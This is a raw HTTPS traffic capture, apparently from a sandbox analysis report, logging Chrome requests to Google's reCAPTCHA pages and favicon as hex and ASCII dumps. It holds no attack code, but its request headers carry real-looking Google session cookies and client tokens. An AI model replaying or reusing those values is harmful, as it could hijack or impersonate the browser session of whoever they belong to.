                                                                                                                                                            2024-02-20 22:46:09 UTC1252INData Raw: 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 61 29 3b 4b 28 74 72 75 65 2c 28 46 28 5b 28 46 28 5b 28 46 28 28 59 28 66 75 6e 63 74 69 6f 6e 28 42 29 7b 55 4b 28 34 2c 42 29 7d 2c 34 31 35 2c 28 28 59 28 66 75 6e 63 74 69 6f 6e 28 42 2c 4a 2c 48 2c 43 2c 47 2c 4e 2c 68 2c 41 2c 4d 2c 4c 2c 72 2c 45 29 7b 66 75 6e 63 74 69 6f 6e 20 52 28 70 2c 57 29 7b 66 6f 72 28 3b 4e 3c 70 3b 29 72 7c 3d 62 28 42 29 3c 3c 4e 2c 4e 2b 3d 38 3b 72 65 74 75 72 6e 20 57 3d 72 26 28 28 4e 2d 3d 70 2c 31 29 3c 3c 70 29 2d 31 2c 72 3e 3e 3d 70 2c 57 7d 66 6f 72 28 4c 3d 28 48 3d 28 72 3d 28 68 3d 6d 28 42 29 2c 4e 3d 30 29 2c 47 3d 28 52 28 33 29 7c 30 29 2b 31 2c 52 28 35 29 29 2c 5b 5d 29 2c 4a 3d 45 3d 30 3b 45 3c 48 3b 45 2b 2b 29 4d 3d 52 28 31 29 2c 4c 2e 70 75 73 68 28 4d 29
                                                                                                                                                            Data Ascii: fromCharCode(a);K(true,(F([(F([(F((Y(function(B){UK(4,B)},415,((Y(function(B,J,H,C,G,N,h,A,M,L,r,E){function R(p,W){for(;N<p;)r|=b(B)<<N,N+=8;return W=r&((N-=p,1)<<p)-1,r>>=p,W}for(L=(H=(r=(h=m(B),N=0),G=(R(3)|0)+1,R(5)),[]),J=E=0;E<H;E++)M=R(1),L.push(M)
                                                                                                                                                            2024-02-20 22:46:09 UTC1252INData Raw: 4e 3d 66 28 28 4a 3d 66 28 28 4a 3d 28 47 3d 6d 28 28 68 3d 6d 28 28 4e 3d 6d 28 42 29 2c 42 29 29 2c 42 29 29 2c 6d 29 28 42 29 2c 42 29 2c 4a 29 2c 42 29 2c 4e 29 2c 42 29 2c 47 29 2c 68 3d 66 28 42 2c 68 29 2c 22 6f 62 6a 65 63 74 22 29 3d 3d 69 44 28 4e 29 29 7b 66 6f 72 28 48 20 69 6e 20 43 3d 5b 5d 2c 4e 29 43 2e 70 75 73 68 28 48 29 3b 4e 3d 43 7d 69 66 28 42 2e 54 3d 3d 42 29 66 6f 72 28 42 3d 30 2c 47 3d 30 3c 47 3f 47 3a 31 2c 48 3d 4e 2e 6c 65 6e 67 74 68 3b 42 3c 48 3b 42 2b 3d 47 29 68 28 4e 2e 73 6c 69 63 65 28 42 2c 28 42 7c 30 29 2b 28 47 7c 30 29 29 2c 4a 29 7d 7d 2c 28 59 28 66 75 6e 63 74 69 6f 6e 28 42 29 7b 6d 76 28 42 2c 34 29 7d 2c 35 30 34 2c 28 59 28 66 75 6e 63 74 69 6f 6e 28 42 2c 4a 2c 48 2c 43 2c 47 29 7b 28 47 3d 66 28 42 2c
                                                                                                                                                            Data Ascii: N=f((J=f((J=(G=m((h=m((N=m(B),B)),B)),m)(B),B),J),B),N),B),G),h=f(B,h),"object")==iD(N)){for(H in C=[],N)C.push(H);N=C}if(B.T==B)for(B=0,G=0<G?G:1,H=N.length;B<H;B+=G)h(N.slice(B,(B|0)+(G|0)),J)}},(Y(function(B){mv(B,4)},504,(Y(function(B,J,H,C,G){(G=f(B,


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            8192.168.2.549730142.250.81.2284437832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-02-20 22:46:09 UTC1457OUTGET /recaptcha/api2/webworker.js?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA HTTP/1.1
                                                                                                                                                            Host: www.google.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: */*
                                                                                                                                                            X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                            Sec-Fetch-Mode: same-origin
                                                                                                                                                            Sec-Fetch-Dest: worker
                                                                                                                                                            Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=lWQi8XFYJHLFBSoU5SiD8DreLMbLqyaMWILUp5KCz1F35zWomRvT9ZsLyU2pNy3cJT6ktzRP5y17XcMG-do_3Wz9iewnxFuXO9-Rn8pvEh73KR_ICtSbe2Z6e_Ei5_nwQyOLl8qvlYvQk4daw9H_NvC1gU1QG5NpYFKB5attDgP678B_k9rlXBPBo2eoAqVFlZ1Em14eX_80yS-dPAqW96lMh_xfWdLzYUhZtjmAdlCguJrDRQwMm7Rczgjwz-ZdX4GSGDCvHFQ8Zn5X9oOgweVqfE-fbaY&cb=yulbx0ey1rif
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-20-22; AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ
                                                                                                                                                            2024-02-20 22:46:09 UTC655INHTTP/1.1 200 OK
                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                            Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                            Expires: Tue, 20 Feb 2024 22:46:09 GMT
                                                                                                                                                            Date: Tue, 20 Feb 2024 22:46:09 GMT
                                                                                                                                                            Cache-Control: private, max-age=300
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            Server: GSE
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Connection: close
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            2024-02-20 22:46:09 UTC108INData Raw: 36 36 0d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 79 69 4e 57 33 52 39 6a 6b 79 4c 56 50 35 2d 45 45 5a 4c 44 7a 55 74 41 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 29 3b 0d 0a
                                                                                                                                                            Data Ascii: 66importScripts('https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/recaptcha__en.js');
                                                                                                                                                            2024-02-20 22:46:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            9192.168.2.549731142.250.81.2284437832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-02-20 22:46:12 UTC1178OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                            Host: www.google.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                            X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                            Referer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGK3X1K4GIjCs5bmnU-QRgcCxGGYio4gxMIxzCz8oSx53B1g933onepuWbALDDhFc9jBNVv2Q5b8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-20-22; AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ
                                                                                                                                                            2024-02-20 22:46:12 UTC705INHTTP/1.1 200 OK
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                            Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                            Content-Length: 5430
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Server: sffe
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Date: Tue, 20 Feb 2024 20:11:03 GMT
                                                                                                                                                            Expires: Wed, 28 Feb 2024 20:11:03 GMT
                                                                                                                                                            Cache-Control: public, max-age=691200
                                                                                                                                                            Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                            Content-Type: image/x-icon
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Age: 9309
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Connection: close
                                                                                                                                                            2024-02-20 22:46:12 UTC547INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff
                                                                                                                                                            Data Ascii: h& ( 0.v]X:X:rY
                                                                                                                                                            2024-02-20 22:46:12 UTC1252INData Raw: ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f7 a6 75 ff ff ff ff ff fd fd fd f9 fd fd fd fa ff ff ff ff 0b be fb ff 05 bc fb ff b6 ec fe ff ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f7 aa 7b ff ff ff ff ff fd fd fd f9 fd fd fd db ff ff ff ff 35 c9 fc ff 0a b2 f9 ff 6b a4 f6 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff
                                                                                                                                                            Data Ascii: BBBBBuBBBBB{5k7R8F2Vb5C
                                                                                                                                                            2024-02-20 22:46:12 UTC1252INData Raw: ee d8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd e8 fe fe fe 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 24 fd fd fd ea ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff eb f5 e7 ff 8f c6 7b ff 54 a9 36 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 7e be 67 ff dd ee d7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd e8 ff ff ff 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd d3 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c4 e1 b9 ff 5c ac 3e ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff
                                                                                                                                                            Data Ascii: /${T6S4S4S4S4S4S4S4S4S4~g"\>S4S4S4S4S4S4S4S4S4S4
                                                                                                                                                            2024-02-20 22:46:12 UTC1252INData Raw: ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fa c8 aa ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd fa ff ff ff ff ff ff ff ff ff ff ff ff 07 bd fb ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 7d dc fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd f9 fd fd fd fa ff ff ff ff ff ff ff ff ff ff ff ff 07 bd fb ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 7d dc fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                            Data Ascii: BBBBBBBBBBB}BBBBBBBBBBB}
                                                                                                                                                            2024-02-20 22:46:12 UTC1127INData Raw: ff ff ff a0 a7 f5 ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 81 8a f2 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 0b fd fd fd d5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b5 ba f7 ff 3e 4b eb ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 3f 4c eb ff ba bf f8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 26 fd fd fd eb ff ff ff ff
                                                                                                                                                            Data Ascii: 5C5C5C5C5C5C5C5C5C5C5C5C5C5C5C>K5C5C5C5C5C5C5C5C5C5C5C5C?L&


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            10192.168.2.549732142.250.81.2284437832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-02-20 22:46:12 UTC1367OUTGET /recaptcha/api2/bframe?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b HTTP/1.1
                                                                                                                                                            Host: www.google.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                            X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                            Referer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGK3X1K4GIjCs5bmnU-QRgcCxGGYio4gxMIxzCz8oSx53B1g933onepuWbALDDhFc9jBNVv2Q5b8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-20-22; AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ
                                                                                                                                                            2024-02-20 22:46:12 UTC891INHTTP/1.1 200 OK
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                            Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Tue, 20 Feb 2024 22:46:12 GMT
                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-RarT66z1PhPlWdWr6lCJxw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            Server: GSE
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Connection: close
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            2024-02-20 22:46:12 UTC361INData Raw: 31 64 30 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20
                                                                                                                                                            Data Ascii: 1d0d<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text/css">/* cyrillic-ext */@font-face
                                                                                                                                                            2024-02-20 22:46:12 UTC1252INData Raw: 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 32 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34 30 2d 41 36 39 46 2c 20 55 2b 46 45 32 45 2d 46 45 32 46 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f
                                                                                                                                                            Data Ascii: to/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//
                                                                                                                                                            2024-02-20 22:46:12 UTC1252INData Raw: 46 39 2c 20 55 2b 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 47 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 41 46 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c
                                                                                                                                                            Data Ascii: F9, U+20AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2'); unicode-range: U+0100-02AF, U+0304, U+0308, U+0329,
                                                                                                                                                            2024-02-20 22:46:12 UTC1252INData Raw: 39 30 2d 30 34 39 31 2c 20 55 2b 30 34 42 30 2d 30 34 42 31 2c 20 55 2b 32 31 31 36 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 46 30 30 2d 31 46 46 46 3b 0a 7d
                                                                                                                                                            Data Ascii: 90-0491, U+04B0-04B1, U+2116;}/* greek-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2) format('woff2'); unicode-range: U+1F00-1FFF;}
                                                                                                                                                            2024-02-20 22:46:12 UTC1252INData Raw: 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 42 42 63 34 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 30 30 30 2d 30 30 46 46 2c 20 55 2b 30 31 33 31 2c 20 55 2b 30 31 35 32 2d 30 31 35 33 2c 20 55 2b 30 32 42 42 2d 30 32 42 43 2c 20 55 2b 30 32 43 36 2c 20 55 2b 30 32 44 41
